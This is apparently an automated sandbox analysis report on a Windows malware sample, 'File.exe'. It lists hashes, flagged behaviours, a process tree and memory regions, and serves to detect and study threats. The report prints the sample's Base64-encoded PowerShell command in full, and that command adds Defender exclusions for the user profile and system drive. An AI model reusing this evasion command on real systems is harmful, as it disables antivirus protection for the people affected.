Analysis
-
max time kernel
144s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
05-05-2022 00:56
Static task
static1
Behavioral task
behavioral1
Sample
File.exe
Resource
win7-20220414-en
General
-
Target
File.exe
-
Size
4.0MB
-
MD5
f74ccaec9935cca19122478058c39f79
-
SHA1
5dbffbe85764d0bd43a90a1ef8eb8d8c5a540527
-
SHA256
8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a
-
SHA512
2cb3379d4c37b2d74f3ae51a0cc0551eb146e5ff6822b0b76e15c63d9f6bd116ed569a5a72cd8be2c37695bfa5cb9ebdd08e27803a9d19cadcc6315b2ebde6ef
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
[New]344334.exepid process 2000 [New]344334.exe -
Loads dropped DLL 1 IoCs
Processes:
File.exepid process 976 File.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1472 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1472 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
File.exe[New]344334.execmd.exedescription pid process target process PID 976 wrote to memory of 2000 976 File.exe [New]344334.exe PID 976 wrote to memory of 2000 976 File.exe [New]344334.exe PID 976 wrote to memory of 2000 976 File.exe [New]344334.exe PID 976 wrote to memory of 2000 976 File.exe [New]344334.exe PID 2000 wrote to memory of 628 2000 [New]344334.exe cmd.exe PID 2000 wrote to memory of 628 2000 [New]344334.exe cmd.exe PID 2000 wrote to memory of 628 2000 [New]344334.exe cmd.exe PID 628 wrote to memory of 1472 628 cmd.exe powershell.exe PID 628 wrote to memory of 1472 628 cmd.exe powershell.exe PID 628 wrote to memory of 1472 628 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\[New]344334.exeC:\Users\Admin\AppData\Roaming\[New]344334.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\[New]344334.exeFilesize
613.8MB
MD51ed195c5c4e80c1501b9658ca8a9cac8
SHA1befd965d451fb7464d110c7ba9db3e753b03e477
SHA256ad5e400711094e4cc806a761cbb25b20364596cbacdbc2ddf8c6feb53e4039b5
SHA512a1a4a4e2ef7d3424f461d33755bb8d761e63d76ba3fa8aa27e667a90bab3692bf6636dd0c7e5977d6776202ea0fa9a5c2501ad2758e03b6202dffa6192635e26
-
C:\Users\Admin\AppData\Roaming\[New]344334.exeFilesize
633.3MB
MD5a8cf820149a81d7b85a64ca72d7fbbcc
SHA138f0d3ecdd7f05e1bd9097da7576458ebfec0e28
SHA256141534dd65409e1fb92900c68f37f2641c87baee47be940b8e880366ce0e9a8f
SHA512cdfd06d48b76602210ab3327072587053b3ace332e744de467cef5a52e7529831b81bbcf1c2d62279dca22c3d6f8fe19d59a947a2be716289990dc533c7a9312
-
\Users\Admin\AppData\Roaming\[New]344334.exeFilesize
665.9MB
MD55ab8f145708b1bf7f408243921664a2e
SHA145d1d852c9770a5005c93a84565c16ceb1fd567a
SHA256fa4fee19c6648895a0b5caef6becd093c3ea365ee23edb1925eb1d870fcf92f0
SHA512f1a40a4afa62864d7d04179a8dec7f9320577cb31c23b88e837d8ec7a6ddcf7be658ea0d7bc6d1a29958c88006fc09db12852d05ce88bb9416a063897bd29e48
-
memory/628-62-0x0000000000000000-mapping.dmp
-
memory/976-54-0x00000000752D1000-0x00000000752D3000-memory.dmpFilesize
8KB
-
memory/1472-63-0x0000000000000000-mapping.dmp
-
memory/1472-65-0x000007FEECC60000-0x000007FEED683000-memory.dmpFilesize
10.1MB
-
memory/1472-67-0x0000000002904000-0x0000000002907000-memory.dmpFilesize
12KB
-
memory/1472-66-0x000007FEEC100000-0x000007FEECC5D000-memory.dmpFilesize
11.4MB
-
memory/1472-68-0x000000001B8F0000-0x000000001BBEF000-memory.dmpFilesize
3.0MB
-
memory/1472-69-0x000000000290B000-0x000000000292A000-memory.dmpFilesize
124KB
-
memory/2000-60-0x000000001C9F0000-0x000000001CC22000-memory.dmpFilesize
2.2MB
-
memory/2000-61-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmpFilesize
8KB
-
memory/2000-59-0x000000013F3B0000-0x000000013F5F8000-memory.dmpFilesize
2.3MB
-
memory/2000-56-0x0000000000000000-mapping.dmp